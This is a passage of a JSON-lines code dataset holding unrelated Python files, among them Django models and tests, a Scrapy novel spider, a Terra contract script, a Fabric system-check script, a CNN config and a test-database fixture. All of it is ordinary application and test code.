10 --merge-subtokens\"\n os.system(cmd)\n\n# only write train\ncorpus = Corpus(f\"{d_path}/en_ewt-ud-train.spacy\")\nnlp = spacy.blank(\"en\")\ntrain_data = corpus(nlp)\n\nfor i, example in enumerate(train_data):\n path = os.path.join(write_path, f\"{i}.txt\")\n with open(path, \"w\") as f:\n f.write(example.y.text)\n\n","sub_path":"syllabus/classes/data/English Dependency Treeback/ewt_to_corpus.py","file_name":"ewt_to_corpus.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67096246","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n# Create your models here.\n\nclass Users(models.Model):\n STANDARD = (\n (0,\"other\"),(1,\"STD-I\"),(2,\"STD-II\"),(3,\"STD-III\"),\n (4,\"STD-IV\"),(5,\"STD-V\"),(6,\"STD-VI\"),(7,\"STD-VII\"),\n (8,\"STD-VIII\"),(9,\"STD-IX\"),(10,\"STD-X\"),(11,\"STD-XI\"),\n (12,\"STD-XII\"))\n GENDER = ((1,\"F\"),(2,\"M\"))\n name = models.CharField(max_length=25)\n surname = models.CharField(max_length=25)\n gender = models.IntegerField(choices=GENDER)\n age = models.IntegerField()\n standard = models.IntegerField(choices=STANDARD)\n school_name = models.CharField(max_length=100)\n pincode = models.CharField(max_length=20)\n users = models.OneToOneField(User, on_delete=models.CASCADE, null=True)\n\n def __str__(self):\n return '''Users(name={}, surname={}, gender={}, age={}, standard={}, school_name={}, pincode={})'''.format(self.name, self.surname, self.gender, self.age, self.standard, self.school_name, self.pincode)\n\nclass Notes(models.Model):\n\n author = models.ForeignKey('auth.User', on_delete=None)\n notes = models.TextField(default='')\n date = models.DateTimeField(auto_now_add=True)\n types = models.CharField(max_length=20)\n\n\n\n def saved_date(self):\n self.date = timezone.now()\n self.save()\n\n def snippest(self):\n return self.notes[:50]+'...'\n\nclass UserActivityPath(models.Model):\n user = models.ForeignKey('auth.User', on_delete=None)\n date = models.DateTimeField(auto_now_add=True)\n seeking = models.IntegerField(default = 0)\n pauses = models.IntegerField(default = 0)\n replaycount = models.IntegerField(default = 0)\n path = models.CharField(max_length=100)\n\n\n def saved_date(self):\n self.date = timezone.now()\n self.save()\n\n def __str__(self):\n return '''UserActivity(user={},date={}, seeking={}, pauses={}, replaycount={}, path={})'''.format(self.user,self.date, self.seeking, self.pauses, self.replaycount, self.path)\n\n\nclass Questions(models.Model):\n user = models.ForeignKey('auth.User',on_delete=None)\n date = models.DateTimeField(auto_now_add=True)\n basic = models.IntegerField(default=0)\n intermediate=models.IntegerField(default=0)\n advance=models.IntegerField(default=0)\n avg = models.IntegerField(default=0)\n","sub_path":"ML/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"266509573","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 14 18:08:23 2020\n\n@author: Manuel Camargo\n\"\"\"\nimport os\nimport pandas as pd\nimport analyzers.sim_evaluator as sim\nfrom utils.support import timeit\nfrom copy import deepcopy\n\ndef load_parms():\n parms = dict()\n parms['output'] = os.path.join('output_files')\n parms['one_timestamp'] = False # Only one timestamp in the log\n column_names = {'Case ID': 'caseid',\n 'Activity': 'task',\n 'lifecycle:transition': 'event_type',\n 'Resource': 'user'}\n # Event-log reading options\n parms['read_options'] = {\n 'timeformat': '%Y-%m-%dT%H:%M:%S.%f',\n 'column_names': column_names,\n 'one_timestamp': parms['one_timestamp'],\n 'filter_d_attrib': True}\n return parms\n\ndef timeseries_test():\n parms = load_parms()\n serie1 = pd.read_csv(os.path.join('tests', 'fixtures', 'ia_valdn.csv'))\n serie2 = pd.read_csv(os.path.join('tests', 'fixtures', 'ia_valdn_gen.csv'))\n serie1 = serie1[['caseid', 'timestamp']]\n serie1['timestamp'] = pd.to_datetime(serie1['timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n serie2 = serie2[['caseid', 'timestamp']]\n serie2['timestamp'] = pd.to_datetime(serie2['timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n \n evaluation = sim.SimilarityEvaluator(serie1, serie2, parms, dtype='serie')\n evaluation.measure_distance('day_emd')\n print(evaluation.similarity)\n evaluation.measure_distance('day_hour_emd')\n print(evaluation.similarity)\n evaluation.measure_distance('cal_emd')\n print(evaluation.similarity)\n\ndef log_test():\n parms = load_parms()\n event_log = pd.read_csv(os.path.join('tests', 'fixtures', 'event_log.csv'))\n event_log['start_timestamp'] = pd.to_datetime(event_log['start_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log['end_timestamp'] = pd.to_datetime(event_log['end_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log = event_log[~event_log.task.isin(['Start', 'End'])]\n if pd.api.types.is_numeric_dtype(event_log['caseid']):\n event_log['caseid'] = event_log['caseid']+1\n event_log['caseid'] = event_log['caseid'].astype(str)\n event_log['caseid'] = 'Case' + event_log['caseid']\n # Duplicate\n event_log_2 = deepcopy(event_log)\n # Add columns\n evaluation = sim.SimilarityEvaluator(event_log, event_log_2, parms, max_cases=100)\n measure(evaluation)\n \ndef log_test_3():\n parms = load_parms()\n event_log = pd.read_csv(os.path.join('tests', 'fixtures', 'event_log.csv'))\n event_log['start_timestamp'] = pd.to_datetime(event_log['start_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log['end_timestamp'] = pd.to_datetime(event_log['end_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log = event_log[~event_log.task.isin(['Start', 'End'])]\n if pd.api.types.is_numeric_dtype(event_log['caseid']):\n event_log['caseid'] = event_log['caseid']+1\n event_log['caseid'] = event_log['caseid'].astype(str)\n event_log['caseid'] = 'Case' + event_log['caseid']\n # Duplicate\n event_log_2 = deepcopy(event_log)\n # Add columns\n evaluation = sim.SimilarityEvaluator(event_log, event_log_2, parms, max_cases=100)\n measure(evaluation)\n\n\ndef log_test_2():\n parms = load_parms()\n event_log = pd.read_csv(os.path.join('tests', 'fixtures', 'BPI_Challenge_2012_W_Two_TS_test.csv'))\n event_log['start_timestamp'] = pd.to_datetime(event_log['start_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log['end_timestamp'] = pd.to_datetime(event_log['end_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log = event_log[~event_log.task.isin(['Start', 'End'])]\n event_log['caseid'] = event_log['caseid']+1\n max_c = event_log.caseid.max()\n event_log_c = deepcopy(event_log)\n event_log_c['caseid'] = event_log_c['caseid'] + max_c\n event_log = pd.concat([event_log, event_log_c], axis=0, ignore_index=True)\n event_log['caseid'] = event_log['caseid'].astype(str)\n event_log['caseid'] = 'Case' + event_log['caseid']\n # Duplicate\n event_log_2 = deepcopy(event_log)\n # Add columns\n evaluation = sim.SimilarityEvaluator(event_log, event_log_2, parms)\n measure(evaluation)\n\n@timeit\ndef measure(evaluation):\n evaluation.measure_distance('mae', verbose=False)\n print(evaluation.similarity)\n evaluation.measure_distance('dl', verbose=True) \n print(evaluation.similarity)\n evaluation.measure_distance('tsd', verbose=False) \n print(evaluation.similarity)\n evaluation.measure_distance('dl_mae', verbose=False) \n print(evaluation.similarity)\n ","sub_path":"support_modules-master/tests/analyzer_test.py","file_name":"analyzer_test.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"510897954","text":"from flask import Flask\nfrom flask_login import LoginManager\nfrom flask_bcrypt import Bcrypt\nfrom flask_mongoengine import MongoEngine\n\nfrom config import Config\nfrom app.logger import MailgunLogger\n\nimport logging, sys\n\napp = Flask(__name__)\napp.config.from_object(Config)\napp.logger.setLevel(logging.DEBUG)\n\ndb = MongoEngine()\ndb.init_app(app)\n\nbcrypt = Bcrypt()\nbcrypt.init_app(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\nstdout_logger = logging.StreamHandler(sys.stdout)\nstdout_logger.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\nstdout_logger.setLevel(logging.DEBUG)\napp.logger.addHandler(stdout_logger)\n\nmailgun_logger = MailgunLogger()\nmailgun_logger.setLevel(logging.ERROR)\nmailgun_logger.setFormatter(logging.Formatter('''\n Message type: %(levelname)s\n Location: %(pathname)s:%(lineno)d\n Module: %(module)s\n Function: %(funcName)s\n Time: %(asctime)s\n\n Message:\n\n %(message)s\n'''))\napp.logger.addHandler(mailgun_logger)\n\nfrom app import routes\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"621900944","text":"# coding: utf-8\n\nfrom django.test import TestCase\nfrom datetime import datetime, date\nfrom ..models import Person, Request\nfrom model_mommy import mommy\n\n# Create your tests here.\n\n\nclass PersonModelTest(TestCase):\n\n \"\"\"\n Test Person model (ticket #1)\n \"\"\"\n\n def setUp(self):\n\n \"\"\"\n Add Person's object to DB\n \"\"\"\n\n self.pers = mommy.make(\n Person,\n first_name=u\"Моє І'мя\",\n last_name=u\"Моє Прізвище\",\n birthday=date(1971, 11, 21),\n email=u\"myemail@ukr.net\",\n other_contacts=u\"Україна\\n+380673332211\"\n )\n\n def test_only_one_person(self):\n\n \"\"\"\n Test only one Person's object in DB\n \"\"\"\n\n self.assertEqual(Person.objects.count(), 1)\n\n def test_fields(self):\n\n \"\"\"\n Test Person model fields\n \"\"\"\n\n pers_db = Person.objects.first()\n\n self.assertEqual(pers_db.created.date(), datetime.now().date())\n self.assertEqual(pers_db.modified.date(), datetime.now().date())\n self.assertEqual(pers_db.first_name, self.pers.first_name)\n self.assertEqual(pers_db.last_name, self.pers.last_name)\n self.assertEqual(pers_db.birthday, self.pers.birthday)\n self.assertEqual(pers_db.bio, self.pers.bio)\n self.assertEqual(pers_db.email, self.pers.email)\n self.assertEqual(pers_db.jid, self.pers.jid)\n self.assertEqual(pers_db.skype, self.pers.skype)\n self.assertEqual(pers_db.other_contacts, self.pers.other_contacts)\n\n def test_unicode_method(self):\n\n \"\"\"\n Test Person model unicode method\n \"\"\"\n\n pers_db = Person.objects.first()\n\n self.assertEqual(\n pers_db.__unicode__(),\n u\"%s %s\" % (self.pers.last_name, self.pers.first_name)\n )\n\n\nclass RequestModelTest(TestCase):\n\n \"\"\"\n Test Request model (ticket #3)\n \"\"\"\n\n def setUp(self):\n\n \"\"\"\n Add Request object to DB\n \"\"\"\n\n self.req = mommy.make(\n Request,\n path_info=u\"/requests/\",\n remote_ip=u\"91.129.117.10\"\n )\n\n def test_fields(self):\n\n \"\"\"\n Test Request model fields\n \"\"\"\n\n req_db = Request.objects.first()\n\n self.assertEqual(req_db.created.date(), datetime.now().date())\n self.assertEqual(req_db.modified.date(), datetime.now().date())\n self.assertEqual(req_db.ajax, self.req.ajax)\n self.assertEqual(req_db.path_info, self.req.path_info)\n self.assertEqual(req_db.method, self.req.method)\n self.assertEqual(req_db.protocol, self.req.protocol)\n self.assertEqual(req_db.remote_ip, self.req.remote_ip)\n self.assertEqual(req_db.secure, self.req.secure)\n self.assertEqual(req_db.referer, self.req.referer)\n\n def test_unicode(self):\n\n \"\"\"\n Test Request model unicode\n \"\"\"\n\n req_db = Request.objects.first()\n\n self.assertEqual(\n req_db.__unicode__(),\n u\"%s asks %s\" % (self.req.remote_ip, self.req.path_info)\n )\n","sub_path":"apps/hello/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"438617708","text":"from pathlib import Path\n\nfrom terra_sdk.client.lcd.api.tx import CreateTxOptions\nfrom terra_sdk.client.localterra import LocalTerra\nfrom terra_sdk.core import Coins\nfrom terra_sdk.core.fee import Fee\nfrom terra_sdk.core.wasm import MsgExecuteContract, MsgInstantiateContract, MsgStoreCode\nfrom terra_sdk.util.contract import get_code_id, get_contract_address, read_file_as_b64\n\n\ndef main():\n terra = LocalTerra()\n terra.gas_prices = \"1uluna\"\n test1 = terra.wallets[\"test1\"]\n\n store_code_tx = test1.create_and_sign_tx(\n CreateTxOptions(\n msgs=[\n MsgStoreCode(\n test1.key.acc_address,\n read_file_as_b64(Path(__file__).parent / \"./strtest.wasm\"),\n )\n ],\n gas_adjustment=1.75,\n )\n )\n store_code_tx_result = terra.tx.broadcast(store_code_tx)\n print(store_code_tx_result)\n\n code_id = get_code_id(store_code_tx_result)\n print(f\"cod_id:{code_id}\")\n\n instantiate_tx = test1.create_and_sign_tx(\n CreateTxOptions(\n msgs=[\n MsgInstantiateContract(\n test1.key.acc_address, test1.key.acc_address, code_id, \"test_init\"\n )\n ],\n gas_prices=\"10uluna\",\n gas_adjustment=2,\n )\n )\n print(instantiate_tx)\n instantiate_tx_result = terra.tx.broadcast(instantiate_tx)\n print(instantiate_tx_result)\n contract_address = get_contract_address(instantiate_tx_result)\n # \"\"\"\n # contract_address = \"terra1e8d3cw4j0k5fm9gw03jzh9xzhzyz99pa8tphd8\"\n result = terra.wasm.contract_query(contract_address, \"count\")\n print(\"get_count1: \", result)\n execute_tx = test1.create_and_sign_tx(\n CreateTxOptions(\n msgs=[\n MsgExecuteContract(test1.key.acc_address, contract_address, \"increment\")\n ],\n gas_adjustment=1.75,\n )\n )\n # {\"uluna\": 1000},\n\n execute_tx_result = terra.tx.broadcast(execute_tx)\n print(execute_tx_result)\n\n result = terra.wasm.contract_query(contract_address, \"count\")\n print(\"get_count2: \", result)\n result = terra.wasm.contract_query(contract_address, \"test\")\n print(\"get_test: \", result)\n\n\n# try:\nmain()\n# except Exception as e:\n# print(\"exception occured\")\n# print(e)\n","sub_path":"integration_tests/contract_str.py","file_name":"contract_str.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"433772067","text":"import os\n\nbilly_directory = '/home/cpd/Projects/billy'\ndata_directory = billy_directory + '/catalog'\nif not os.path.exists(data_directory):\n os.makedirs(data_directory)\n\n# note assumes that in data_directory there is:\n# sw_data/cutout_catalog/catalog.csv\n# sw_data/cutout_catalog/cutouts\n# galzoo_data/training_solutions_rev1.csv\n# galzoo_data/images_training_rev1\n\nmodel_directory = billy_directory + '/trained_models'\nif not os.path.exists(model_directory):\n os.makedirs(model_directory)\n\n# param to decrease memory usage. Must play with!\nbase_div=4\ntest_code = False\n\nif test_code:\n # likely testing\n number_data_train = 1000\n number_data_test = 1000\nelse:\n number_data_train = -1 # 1000\n number_data_test = -1 #1000\n\n\nhyperparameters = {'default_learning_rate': 1.7e-3,\n 'default_reg_strength': 3.4e-6,\n 'batch_size': 32,\n 'default_use_nesterov_momentum': False,\n 'default_use_rms_prop': False,\n 'default_momentum_decay_rate': 0.9,\n 'rotate_and_flip': True,\n 'random_seed': None}\n\nalex_net = [\n\n # {'type':'convolution', 'stride': 4, 'filter_size':11, 'depth':96, 'pad':3, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'convolution', 'stride': 2, 'filter_size':5, 'depth':int(96/base_div), 'pad':9, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'max_pool', 'stride':2, 'filter_size':3},\n\n {'type':'convolution', 'stride': 1, 'filter_size':5, 'depth':int(256/base_div), 'pad':2, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'max_pool', 'stride':2, 'filter_size':3},\n\n {'type':'convolution', 'stride': 1, 'filter_size':3, 'depth':int(384/base_div), 'pad':1, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'convolution', 'stride': 1, 'filter_size':3, 'depth':int(384/base_div), 'pad':1, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'convolution', 'stride': 1, 'filter_size':3, 'depth':int(256/base_div), 'pad':1, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'max_pool', 'stride':2, 'filter_size':3},\n\n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'},\n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'},\n {'type':'softmax', 'cost_function':'rms_error'}]\n\nandrew_net = [\n # 96x96x3 = 27,648 input neurons\n {'type':'convolution', 'stride': 2, 'filter_size':10, 'depth':int(96/base_div), 'pad':False, 'dropout_prob': 0, 'activation':'relu'}, # 96 -> 44, 185,856 neurons, 28,800 activations\n {'type':'max_pool', 'stride':2}, # 44 -> 22, 92,928 neurons, 0 activations\n\n {'type':'convolution', 'stride': 1, 'filter_size':6, 'depth':int(256/base_div), 'pad':False, 'dropout_prob': 0, 'activation':'relu'}, # 22 -> 17, 73,984 neurons, 884,736 activations\n {'type':'convolution', 'stride': 1, 'filter_size':4, 'depth':int(256/base_div), 'pad':False, 'dropout_prob': 0, 'activation':'relu'}, # 17 -> 14, 50,176 neurons, 1,048,576 activations\n {'type':'max_pool', 'stride':2}, # 14 -> 7, 25,088 neurons, 0 activations\n\n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'}, # 4,096 neurons, 2 x 51,380,224 activations \n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'}, # 4,096 neurons, 2 x 16,777,216 activations\n {'type':'softmax', 'cost_function':'rms_error'}] # 37 neurons, 151,552 activations (galzoo output)\n\n#####\n# hyperparameter parameters\n#####\n\ngalzoo_random_hyperparameter_epochs = 20\ngalzoo_random_hyperparameter_base_epochs = 5\ngalzoo_random_hyperparameter_lrmin = -0.5\ngalzoo_random_hyperparameter_lrmax = 0.5\ngalzoo_random_hyperparameter_regmin = -4\ngalzoo_random_hyperparameter_regmax = -3.5\ngalzoo_random_hyperparameter_min_train = 0.72\ngalzoo_random_hyperparameter_min_save = 0.80\n\nsw_random_hyperparameter_binary_classification = True\nsw_random_hyperparameter_epochs = 100\nsw_random_hyperparameter_base_epochs = 5\nsw_random_hyperparameter_lrmin = -2.5\nsw_random_hyperparameter_lrmax = -1.5\nsw_random_hyperparameter_regmin = -8\nsw_random_hyperparameter_regmax = -3\nsw_random_hyperparameter_min_train = 0.8\nsw_random_hyperparameter_min_save = 0.9\n\n#####\n# Further train parameters\n#####\n\ngalzoo_further_train_pre_epochs = 120\ngalzoo_further_train_epochs = 20\ngalzoo_further_train_iterations = 6\ngalzoo_further_train_learning_rate = 1.95419652268\ngalzoo_further_train_reg_strength = 0.000109061586277\n\nsw_further_train_pre_epochs = 105\nsw_further_train_epochs = 50\nsw_further_train_iterations = 10\nsw_further_train_binary_classification = True\nsw_further_train_learning_rate = 0.0246245291367\nsw_further_train_reg_strength = 2.46381024024e-08\n\n#####\n# fixed layers\n#####\nfix_layers = [0]\ntl_pre_epochs = 0\n","sub_path":"code/tl_production/billy_config_cpd.py","file_name":"billy_config_cpd.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"113584672","text":"from typing import List\n\n#\n# @lc app=leetcode id=57 lang=python3\n#\n# [57] Insert Interval\n#\n# https://leetcode.com/problems/insert-interval/description/\n#\n# algorithms\n# Hard (32.46%)\n# Likes: 1246\n# Dislikes: 144\n# Total Accepted: 217.5K\n# Total Submissions: 669.8K\n# Testcase Example: '[[1,3],[6,9]]\\n[2,5]'\n#\n# Given a set of non-overlapping intervals, insert a new interval into the\n# intervals (merge if necessary).\n#\n# You may assume that the intervals were initially sorted according to their\n# start times.\n#\n# Example 1:\n#\n#\n# Input: intervals = [[1,3],[6,9]], newInterval = [2,5]\n# Output: [[1,5],[6,9]]\n#\n#\n# Example 2:\n#\n#\n# Input: intervals = [[1,2],[3,5],[6,7],[8,10],[12,16]], newInterval = [4,8]\n# Output: [[1,2],[3,10],[12,16]]\n# Explanation: Because the new interval [4,8] overlaps with\n# [3,5],[6,7],[8,10].\n#\n# NOTE: input types have been changed on April 15, 2019. Please reset to\n# default code definition to get new method signature.\n#\n#\n\n# @lc code=start\n\n\nclass Solution:\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n # Merges intervals\n def merge2(x, y):\n m2 = []\n if x[0] > y[0]: x,y = y,x\n # 1. no overlap\n if x[1] < y[0]:\n m2 = [x, y]\n # 2. full overlap\n elif x[0] <= y[0] and y[1] <= x[1]:\n m2 = [x]\n # 2. partial overlap\n elif x[0] <= y[0] <= x[1]:\n m2 = [[x[0], y[1]]]\n #print(\"Merged two intervals \", x, y, m2)\n return m2\n\n # Merges 3 sorted intervals\n def merge3(x, y, z):\n m2 = merge2(x, y)\n m3 = []\n if len(m2) == 1:\n m3 = merge2(m2[0], z)\n else:\n m3 = [m2[0]] + merge2(m2[1], z)\n #print(\"Merged three intervals \", x, y, z, m3)\n return m3\n\n # Finds floor interval\n def findMergeInterval(intervals, val):\n start = 0\n end = len(intervals)-1\n res = 0\n while start <= end:\n mid = (start + end) // 2\n if intervals[mid][0] <= val:\n res = mid\n start = mid + 1\n else:\n end = mid - 1\n #print(\"Found merge interval index for \", val, \" to be \", res)\n return res\n\n # Intervals are non-overlapping\n sz = len(intervals)\n if not sz:\n return [newInterval]\n start = findMergeInterval(intervals, newInterval[0])\n end = findMergeInterval(intervals, newInterval[1])\n # TODO: simplify using mergeN\n if start == end:\n m3 = merge2(newInterval, intervals[start])\n else:\n m3 = merge3(intervals[start], newInterval, intervals[end])\n return intervals[:start] + m3 + intervals[end+1:]\n\n# @lc code=end\n","sub_path":"57.insert-interval.py","file_name":"57.insert-interval.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"322450781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 20 11:48:21 2020\n\n@author: dormoyc\n\"\"\"\n\nimport argparse\nimport pika\nimport mykeys\n\nimport time\n\namqpurl = mykeys.cloudamqplink\nmyQueue = \"myWorkingQueue\"\n\ndef callback(ch, method, properties, body):\n print (\" [x] Received %r\" % body)\n \n\n\n \n \nconnection = pika.BlockingConnection(pika.URLParameters(amqpurl))\nchannel = connection.channel()\n \nchannel.exchange_declare(exchange='logs',\n exchange_type='fanout')\nresult = channel.queue_declare(queue='', exclusive=True)\nqueue_name = result.method.queue\n \nchannel.queue_bind(exchange='logs',\n queue=myQueue)\n\nchannel.basic_consume(callback,\n queue=myQueue,\n no_ack=True)","sub_path":"Session4/read_suscriber.py","file_name":"read_suscriber.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"229225292","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom pymongo import MongoClient\n\n\n# scrapy crawl biqukan --nolog\nclass BiqukanSpider(scrapy.Spider):\n print(\"*************************************************************************\")\n print(\"\\n\\t\\t欢迎使用《笔趣看》小说下载小工具\\n\\n\\t\\t作者:NJ宇众不同\\t时间:2019-02-17\\n\")\n print(\"*************************************************************************\")\n\n # 小说地址\n # target_url = str(input(\"请输入小说目录下载地址:\\n\"))\n\n name = 'biqukan'\n allowed_domains = ['biqukan.com']\n start_urls = ['https://www.biqukan.com/57_57405/']\n\n # 建立MongoDB数据库连接\n client = MongoClient('localhost', 27017)\n # 连接所需数据库\n db = client.biqukan\n # 连接所用集合,也就是我们通常所说的表\n collection = db.novel\n\n def parse(self, response):\n # 提取小说基本信息\n # 小说名称\n novel_name = response.xpath('.//div[@class=\"info\"]//h2//text()').extract()\n if novel_name:\n flag_name = \"《\" + novel_name[0] + \"》\" + \"正文卷\"\n print(\"flag_name====\", flag_name)\n\n # 提取小章节信息\n # 章节列表\n chapters = response.xpath('.//div[@class=\"listmain\"]//dl//dt | .//div[@class=\"listmain\"]//dl//dd')\n # print(chapters)\n begin_flag = False\n for child in chapters:\n # print(child)\n if child != '\\n':\n # 只有正文章节才提取\n if child.xpath('.//text()').extract()[0] == u\"%s\" % flag_name:\n begin_flag = True\n if begin_flag == True and len(child.xpath('.//a')) > 0:\n aMark = child.xpath('.//a')\n chapterHref = aMark.xpath('@href').extract()\n download_url = \"https://www.biqukan.com\" + chapterHref[0]\n yield scrapy.Request(url=download_url, callback=self.parse)\n chapter_name = response.xpath('.//div[@class=\"content\"]//h1//text()').extract()\n # print(chapter_name)\n if chapter_name:\n chapter_content = response.xpath('.//div[@id=\"content\" and @class=\"showtxt\"]//text()').extract()\n # print(chapter_content[0])\n # soup_text = chapter_content[0].replace('\\xa0', '')\n # print(chapter_content)\n self.saveNovel(chapter_name[0], chapter_content)\n\n # 向集合中插入数据\n # https://www.biqukan.com/0_973/276441.html\n def saveNovel(self, name, text):\n content = \"\"\n for each in text:\n content += each.replace('\\xa0', '')\n\n if self.findNovelByName(name) is None:\n print(\"====保存数据====\")\n self.collection.insert(\n {\n \"name\": name,\n \"content\": content,\n }\n )\n\n # 根据小说ID查询\n def findNovelByName(self, name):\n print(\"====查找数据====\")\n res = self.collection.find_one({\"name\": name})\n print(res)\n return res\n","sub_path":"biqukan_pro/biqukan_pro/spiders/biqukan.py","file_name":"biqukan.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"430751505","text":"from fabric import Connection\nfrom fabric import SerialGroup\n\ndef disk_free(c):\n uname = c.run('uname -s',hide=True)\n if 'Linux' in uname.stdout:\n command = \"free -h\"\n return c.run(command,hide=True).stdout.strip()\n else:\n print(\"Linux not found in uname\")\n\n\nfor conn in SerialGroup('192.168.121.157','192.168.121.163'):\n print(f\"{conn} : {disk_free(conn)}\")\n\n\n#192.168.121.157 : 48%\n","sub_path":"multiple2.py","file_name":"multiple2.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200219131","text":"import sys\nimport argparse\nimport subprocess\n\n\ndef parse_cli_args():\n parser = argparse.ArgumentParser(\n description=\"Firetail - An EVE Online Discord Bot\")\n parser.add_argument(\n \"--no-restart\", \"-r\",\n help=\"Disables auto-restart.\", action=\"store_true\")\n parser.add_argument(\n \"--debug\", \"-d\", help=\"Enabled debug mode.\", action=\"store_true\")\n return parser.parse_known_args()\n\n\ndef main():\n print('''\n ______ _ _ _ _ \\n\n | ____(_) | | (_) | \\n\n | |__ _ _ __ ___| |_ __ _ _| | \\n\n | __| | | '__/ _ \\ __/ _` | | | \\n\n | | | | | | __/ || (_| | | | \\n\n |_| |_|_| \\___|\\__\\__,_|_|_| \\n\n ''')\n\n if sys.version_info < (3, 5, 0):\n print(\"ERROR: Minimum Python version not met.\\n\"\n \"Firetail requires Python 3.5 or higher.\\n\")\n return\n\n print(\"Launching Firetail...\", end=' ', flush=True)\n\n launch_args, ft_args = parse_cli_args()\n\n if launch_args.debug:\n ft_args.append('-d')\n\n ft_args.append('-l')\n\n while True:\n code = subprocess.call([\"firetail-bot\", *ft_args])\n if code == 0:\n print(\"Goodbye!\")\n break\n elif code == 26:\n print(\"Rebooting! I'll be back in a bit!\\n\")\n continue\n else:\n if launch_args.no_restart:\n break\n print(\"I crashed! Trying to restart...\\n\")\n print(\"Exit code: {exit_code}\".format(exit_code=code))\n sys.exit(code)\n","sub_path":"firetail/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168227615","text":"# -*- coding: utf8 -*-\nimport datetime\nimport random\nimport re\n\nfrom zeeguu.model import Article\nfrom zeeguu.model.exercise import Exercise\n\nfrom zeeguu.model.url import Url\nfrom zeeguu.model.text import Text\nfrom zeeguu.model.exercise_outcome import ExerciseOutcome\nfrom zeeguu.model.exercise_source import ExerciseSource\nfrom zeeguu.model.user_word import UserWord\nfrom zeeguu.model.bookmark import Bookmark\nfrom zeeguu.model.language import Language\nfrom zeeguu.model.user import User\n\nWORD_PATTERN = re.compile(\"\\[?([^{\\[]+)\\]?( {[^}]+})?( \\[[^\\]]\\])?\")\n\nTEST_PASS = 'test'\nTEST_EMAIL = 'i@mir.lu'\n\nTEST_BOOKMARKS_COUNT = 2\n\ndef drop_current_tables(db):\n # We have to do a commit() before the drop_all()\n # Otherwise the system just freezes sometimes!\n db.session.commit()\n db.session.close_all()\n # Initial cleanup\n db.reflect()\n db.drop_all()\n # Creating the tables again\n db.create_all()\n\n\ndef add_bookmark(db, user, original_language, original_word, translation_language, translation_word, date, the_context,\n the_url, the_url_title):\n session = db.session\n\n url = Url.find_or_create(session, the_url, the_url_title)\n\n article = Article.find_or_create(session, url.as_string())\n\n text = Text.find_or_create(session, the_context, translation_language, url, article)\n\n origin = UserWord.find_or_create(session, original_word, original_language)\n\n translation = UserWord.find_or_create(session, translation_word, translation_language)\n\n b1 = Bookmark(origin, translation, user, text, date)\n db.session.add(b1)\n db.session.commit()\n\n return b1\n\n\n#\ndef create_minimal_test_db(db):\n drop_current_tables(db)\n\n # Some common test fixtures\n de = Language(\"de\", \"German\")\n en = Language(\"en\", \"English\")\n nl = Language(\"nl\", \"Dutch\")\n es = Language(\"es\", \"Spanish\")\n fr = Language(\"fr\", \"French\")\n cn = Language(\"zh-CN\", \"Chinese\")\n\n db.session.add_all([en, de, nl, es, fr, cn]);\n\n mir = User(TEST_EMAIL, \"Mircea\", TEST_PASS, de, en)\n\n 